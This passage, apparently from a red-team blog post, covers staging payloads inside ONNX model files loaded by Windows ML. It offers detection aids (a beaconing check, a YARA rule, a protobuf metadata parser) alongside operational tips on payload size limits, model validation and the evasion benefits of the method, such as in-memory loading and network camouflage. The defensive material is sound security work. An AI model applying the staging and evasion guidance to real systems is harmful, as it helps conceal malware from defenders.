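    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    mean_gap = statistics.fmean(gaps)
    if mean_gap == 0:
        return float("inf")
    return statistics.pstdev(gaps) / mean_gap


def looks_like_beaconing(timestamps: list, max_cv: float = 0.1, min_events: int = 6) -> bool:
    """Flag a series with enough events and very regular spacing.

    max_cv and min_events are illustrative defaults, not tuned thresholds.
    """
    return len(timestamps) >= min_events and interval_regularity(timestamps) <= max_cv


if __name__ == "__main__":
    every_minute = [0, 60, 120, 180, 240, 300, 360]
    print("regular series flagged:", looks_like_beaconing(every_minute))
```

Beacons that add jitter will have a higher coefficient of variation, so in practice the download count per host per day is a useful second signal alongside regularity.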

YARA Rule

The rule below keys on the default strings used by the PoC in this post (the weight_hash_N key names and the single Identity node), so it will miss variants that rename them. Treat it as a starting point rather than a general detector.

rule ONNX_Payload_Stager {
    meta:
        description = "ONNX model with suspicious metadata (potential payload staging)"
        author = "HxR1"

    strings:
        // ONNX magic: ir_version field (varint field 1, value 7-9)
        $onnx_ir = { 08 (07|08|09) }

        // Identity op in protobuf (common in stager models)
        $identity = "Identity" ascii

        // Base64-heavy metadata keys (payload chunks)
        $chunk_key = /weight_hash_\d+/ ascii

        // Minimal graph with single node
        $graph_name = "model" ascii
        $input_name = "input" ascii
        $output_name = "output" ascii

    condition:
        $onnx_ir at 0 and $identity and $chunk_key and
        $graph_name and $input_name and $output_name and
        filesize < 5MB
}
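Because a string-based rule is easy to sidestep by renaming keys, a structural check is a useful complement. The following is a minimal sketch for triage, assuming the model bytes are already on hand: it walks the top-level ModelProto fields with the standard library only and reports the size of each metadata_props value (field 14). The helper names are hypothetical, and groups (wire types 3 and 4) are deliberately rejected.

```python
def read_varint(buf: bytes, pos: int):
    """Decode one protobuf varint and return (value, next_pos)."""
    result = 0
    shift = 0
    while True:
        if pos >= len(buf) or shift > 63:
            raise ValueError("truncated or oversized varint")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def iter_fields(buf: bytes):
    """Yield (field_number, wire_type, value) for each field in a message."""
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire == 0:  # varint
            value, pos = read_varint(buf, pos)
        elif wire == 1:  # 64-bit fixed
            value, pos = buf[pos:pos + 8], pos + 8
        elif wire == 5:  # 32-bit fixed
            value, pos = buf[pos:pos + 4], pos + 4
        elif wire == 2:  # length-delimited
            length, pos = read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("length-delimited field overruns buffer")
            value, pos = buf[pos:pos + length], pos + length
        else:
            raise ValueError(f"unsupported wire type {wire}")
        yield field, wire, value


def metadata_value_sizes(model_bytes: bytes) -> dict:
    """Map each metadata_props key to the byte length of its value."""
    sizes = {}
    for field, wire, value in iter_fields(model_bytes):
        if field == 14 and wire == 2:
            key, val = b"", b""
            for sub_field, sub_wire, sub_value in iter_fields(value):
                if sub_wire == 2 and sub_field == 1:
                    key = sub_value
                elif sub_wire == 2 and sub_field == 2:
                    val = sub_value
            sizes[key.decode("utf-8", "replace")] = len(val)
    return sizes
```

Sorting the result by size and comparing the total against the size of the graph field gives a quick view of whether metadata dominates the file, which is the pattern described under Network above.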

Operational Considerations

Model Validity

The staged model must pass ONNX validation. WinML rejects malformed protobuf. Always test with:

import onnx
model = onnx.load("staged.onnx")
onnx.checker.check_model(model)  # Throws on invalid model

Size Constraints

Metadata method: Each StringStringEntryProto value can hold ~16MB (protobuf length limit). Base64 overhead is 33%. Practical limit: ~12MB raw payload per entry, unlimited entries.
Weight tensor method: TensorProto.raw_data has no practical size limit. Models with 100MB+ weight tensors are common in production ML.
Network: WinHTTP handles responses up to 4GB. The real constraint is your operational patience.

Process Integrity

Loading WinML requires COM initialization (CoInitializeEx). If your loader runs in a context where COM is already initialized with incompatible flags, use winrt::init_apartment() with appropriate threading model.

Windows Version

WinML (Windows.AI.MachineLearning) requires Windows 10 1809 (build 17763) or later. On older systems, the WinRT activation will fail. Check IsWindows10OrGreater() and RtlGetVersion for build number before attempting WinML loading.

Conclusion

The Windows ML subsystem provides a powerful, overlooked primitive for offensive operations. By embedding payloads in valid ONNX model files, red team operators gain:

Legitimate binary signatures: Import tables and API calls match real ML applications
Network camouflage: ONNX protobuf traffic blends with genuine model serving infrastructure
In-memory operation: WinML loads models from streams - zero disk artifacts
Behavioral cover: ETW telemetry shows genuine ML workload activity

The technique works on every modern Windows installation without additional runtime dependencies. As ML inference becomes ubiquitous on endpoints, the attack surface will only grow.

The detection opportunities exist but require defenders to look deeper than surface-level behavioral analysis. Organizations should audit WinML usage patterns, monitor for models loaded without inference, and inspect ONNX metadata for anomalous entropy.

All code in this post is provided for authorized security research and red team operations. Test in environments where you have explicit authorization.